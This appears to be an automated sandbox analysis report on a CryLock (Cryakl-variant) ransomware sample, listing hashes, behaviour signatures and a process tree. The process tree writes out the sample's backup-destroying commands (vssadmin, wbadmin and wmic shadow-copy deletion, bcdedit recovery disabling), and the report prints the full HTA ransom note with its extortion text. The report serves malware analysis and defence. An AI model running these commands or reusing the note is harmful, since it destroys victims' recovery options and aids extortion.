Overview

overview

10

Static

static

10

2024-06-15...kl.exe

windows7-x64

10

2024-06-15...kl.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    15-06-2024 00:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-06-15_6e3d30868f97949059561ef9335f536a_cryakl.exe

  • Size

    209KB

  • MD5

    6e3d30868f97949059561ef9335f536a

  • SHA1

    31c408fb8fb80f485bb99bd06214f5e8eb6e6f59

  • SHA256

    884f5e98b2621da3bd264cd99538ad17c5ed754e529fbf6ae8280de7a990d2f6

  • SHA512

    a1e98ed79aacbe6c0b61733cf0bbc8abc91e92298c337fe6421a3cbfe89202607cda746f663a654c6b6734e845fa29f99857ff5b0465c1a5f17d176918dd97de

  • SSDEEP

    3072:wPjRTnHvzG31UsczGF9Fu7/SppSH7WwmH4er1Csax00NOWmVaW0YxLjx/KitCaR:OlTPejc0pSbWA3x0cYxRiit

Score
10/10
crylockdefense_evasiondiscoveryexecutionimpactpersistenceransomwarespywarestealer

Malware Config

Extracted

Family

crylock

Attributes
  • emails

    [email protected]

    [email protected]

  • ransomnote

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <title>CryLock</title> <hta:application showInTaskBar="no" APPLICATION="yes" ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no" applicationname="CryLock" border="thick" contexmenu="no" scroll="no" selection="yes" singleinstance="yes" windowstate="normal" MAXIMIZEBUTTON="NO" BORDER="DIALOG" width="100" height="100" MINIMIZEBUTTON="NO"></hta:application> <script language="JavaScript"> var ud=0; var op=0xc7bf30; var zoc=0; function document.onkeydown() { var alt=window.event.altKey; if (event.keyCode==116 || event.keyCode==27 || alt && event.keyCode==115) { event.keyCode=0; event.cancelBubble=true; return false; } } function document.onblur() { alert('Attention! This important information for you!'); } function ChangeTime() { var sd = new Date('<%DOUBLE_DATETIME%>'); var dn = new Date(); if (sd.getTime()<dn.getTime()) { var dt=document.getElementById('pwr'); dt.innerHTML='<font color="red" size="5"><b>Price is raised!</b></font>'; dt.style.height=78; zoc=1; } else { var delta=sd.getTime()-dn.getTime(); delta=new Date(delta); var dd=(delta.getUTCDate()-1)+((delta.getUTCMonth())*31); var hh=delta.getUTCHours(); var mm=delta.getUTCMinutes(); var ss=delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt=document.getElementById('dt'); dt.innerHTML='<font face="monospace" color="#c2c2c2" size="4"><b>'+dd+' '+hh+':'+mm+':'+ss+'</b></font>'; } var sd = new Date('<%UNDECRYPT_DATETIME%>'); dn = new Date(); if (sd.getTime()<dn.getTime()) { var dt=document.getElementById('lctw'); dt.innerHTML='<font color="red" size="5"><b>Last chance to decrypt your files!</b></font>'; zoc=2; } else { var delta=sd.getTime()-dn.getTime(); delta=new Date(delta); var dd=(delta.getUTCDate()-1)+((delta.getUTCMonth())*31); var hh=delta.getUTCHours(); var mm=delta.getUTCMinutes(); var ss=delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt=document.getElementById('et'); dt.innerHTML='<font face="monospace" color="#c2c2c2" size="4"><b>'+dd+' '+hh+':'+mm+':'+ss+'</b></font>'; } } function getRandomArbitrary(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } function Rndom() { document.getElementById("blumid").focus(); var bid=document.getElementById('blumid'); var bem=document.getElementById('blummail'); if (ud==0) { op=op-0x10; } else { op=op+0x10; } if (op<=0xc00000) { ud=1; } if (op>=0xc7bf30) { ud=0; } bid.style.backgroundColor=op; bem.style.backgroundColor=op; var xx=''; var i=0; while (i<19) { xx=xx+getRandomArbitrary(0,2); i=i+1; } if (zoc==0) { var dt=document.getElementById('rc'); rc.innerHTML='<font face="monospace" color="white" size="5"><b>'+xx+'</b></font>'; } else { if (zoc==1) { var dt=document.getElementById('rc'); rc.innerHTML='<font face="monospace" color="red" size="5"><b>Price is raised!</b></font>'; } else { var dt=document.getElementById('rc'); rc.innerHTML='<font face="monospace" color="red" size="4"><b>Price is raised!<br>Last chance to decrypt your files!</b></font>'; } } } function Start() { window.resizeTo(800,500) setInterval(ChangeTime,1000); setInterval(Rndom,100); } function copytext(s) { window.clipboardData.setData("Text",s); alert(s+' copied to clipboard'); } function Restart() { alert('Attention! This important information for you!'); } </script> <body style="background-color:#0066CC;" OnLoad="Start()"> <div id="pwr" align="center" style="position:absolute; top:10px; left:10px; width:20%; border: 2px solid #c2c2c2;"> <font color="#c7bf30"><b>Payment will be raised after</b></font> <br> <div id="dt"> <font face="monospace" color="#c2c2c2" size="4">-- days --:--:--</font> </div> </div> <div align="center" style="position:absolute; top:10px; left:170px; width:58%;"> <font face="monospace" color="white" size="4"><b>Your files have been encrypted...</b></font> </div> <div align="center" style="position:absolute; top:60px; left:170px; width:58%;"> <div id="rc"> <font face="monospace" color="white" size="5"><b>00000000000000000000</b></font> </div> </div> <div id="lctw" align="center" style="position:absolute; top:10px; left:620px; width:20%; border: 2px solid #c2c2c2;"> <font color="#c7bf30"><b>Your files will be lost after</b></font> <br> <div id="et"> <font face="monospace" color="#c2c2c2" size="4">-- days --:--:--</font> </div> </div> <div style="background-color:white;overflow-x:hide; overflow-y:scroll; position:absolute; top:100px; left:10px; width:768px; height:320px"> Decrypt files? Write to this mails: <font face="monospace" OnClick="copytext('<%MAIN_CONTACT%>')"><b><%MAIN_CONTACT%></b></font> or <font face="monospace" OnClick="copytext ('<[email protected]>')"><b><[email protected]></b></font>. Reserve mail <font face="monospace" OnClick="copytext ('[email protected]')"><b>[email protected]</b></font>. <br> Your unique ID <font face="monospace" OnClick="copytext('[<%HID%>]')"><b>[<%HID%>] <font size="2">[copy]</font></b></font> <br> <font color="#ff0000 ">Warning! All your data was extracted and copied! If you don't contact us, it will be sold and uploaded to public sources!</font> </div> <div title="Click to copy" OnClick="copytext('[<%HID%>]')" id="blumid" style="cursor:pointer;background-color:#c7bf30; position:absolute; top:430px; left:10px; width:380px; height:20px"> <b>Your ID [<%HID%>] <font size="2">[copy]</font></b> </div> <div title="Click to copy" OnClick="copytext('<%MAIN_CONTACT%>')" id="blummail" style="cursor:pointer;background-color:#c7bf30; position:absolute; top:430px; left:400px; width:380px; height:20px"> <b>Write to <%MAIN_CONTACT%> <font size="2">[copy]</font></b> </div> </body> </html>

rsa_pubkey.plain

Signatures

  • Crylock

    Ransomware family, which is a new variant of Cryakl ransomware.

    ransomwarecrylock
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-06-15_6e3d30868f97949059561ef9335f536a_cryakl.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-06-15_6e3d30868f97949059561ef9335f536a_cryakl.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2240
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "vssadmin delete shadows /all /quiet"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2036
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:2588
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0"
      2⤵
        PID:1344
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c "wbadmin DELETE BACKUP -keepVersions:0"
        2⤵
          PID:2080
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "wmic SHADOWCOPY DELETE"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2640
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic SHADOWCOPY DELETE
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2744
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} recoveryenabled No"
          2⤵
            PID:2708
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
            2⤵
              PID:2636
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2760

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\$Recycle.Bin\S-1-5-21-39690363-730359138-1046745555-1000\how_to_decrypt.hta
            Filesize

            6KB

            MD5

            97a92b1771a79e1ce68fe42595b9cb6e

            SHA1

            113f22251fd0b9a28c0bcb080dfe788ddb18d4cb

            SHA256

            fe87f2d0fa379da7ea1a325e341abbf60a025f8d7cf02c2306cf77dedbe8b371

            SHA512

            e03650111f3e2ca05fdc59b74e87c4757ed065e3b2a941cab7c57f4d9d8e1b187c9b2cc872422590cac22d115c188279c48cb70b2785844bc5d3ab02427246bf

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\c-1718411638.log
            Filesize

            548B

            MD5

            a2bd8cc6a580dc73e2daf5a1d2610520

            SHA1

            e0b891dddc3b86d4d20d22896a427fd54a59c5f5

            SHA256

            83140fa51ec108f2b6f3e08796ec6f8ded7ab71f2f8144b7ba955ec5df79c9d5

            SHA512

            b6f7fa514e62cefef13239ef007dab38f84d02c6b77d943bebfe1b081fbc5fbee52b1bdc57b01b5a9b99b1c958809bbdb0e17319ad0a6a8d75c2b67aa7b05f8d

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\c-1718411638.log
            Filesize

            4KB

            MD5

            b1f55d52c21ed6928d0ba1760a673ab4

            SHA1

            3a5a7da67fa57a9f2a9dd12ddd84e5bf3033844c

            SHA256

            41bd9511363d3573d9c94c45dcb4dcad8decb1d41acc0d623978ae069ec52ee0

            SHA512

            1f3e358927000561890e73c74bff7c89e56cee9497ee7f61597141cbe10efa61a8bdf90356a94e4d4a0cf8d27b3c11d8a0d858c31b2bca88f635874667fccc4b

            Download Submit

          • memory/2240-721-0x0000000000400000-0x000000000043C000-memory.dmp

            Filesize

            240KB

            Download

          • memory/2240-1-0x0000000000400000-0x000000000043C000-memory.dmp

            Filesize

            240KB

            Download

          • memory/2240-2065-0x0000000000400000-0x000000000043C000-memory.dmp

            Filesize

            240KB

            Download

          • memory/2240-7-0x0000000000400000-0x000000000043C000-memory.dmp

            Filesize

            240KB

            Download

          • memory/2240-2204-0x0000000000400000-0x000000000043C000-memory.dmp

            Filesize

            240KB

            Download

          • memory/2240-6-0x0000000000400000-0x000000000043C000-memory.dmp

            Filesize

            240KB

            Download

          • memory/2240-2969-0x0000000000400000-0x000000000043C000-memory.dmp

            Filesize

            240KB

            Download

          • memory/2240-3014-0x0000000000400000-0x000000000043C000-memory.dmp

            Filesize

            240KB

            Download

          • memory/2240-3169-0x0000000000400000-0x000000000043C000-memory.dmp

            Filesize

            240KB

            Download

          • memory/2240-3170-0x0000000000400000-0x000000000043C000-memory.dmp

            Filesize

            240KB

            Download

          • memory/2240-3172-0x0000000000400000-0x000000000043C000-memory.dmp

            Filesize

            240KB

            Download

          • memory/2240-3173-0x0000000000400000-0x000000000043C000-memory.dmp

            Filesize

            240KB

            Download

          • memory/2240-3174-0x0000000000400000-0x000000000043C000-memory.dmp

            Filesize

            240KB

            Download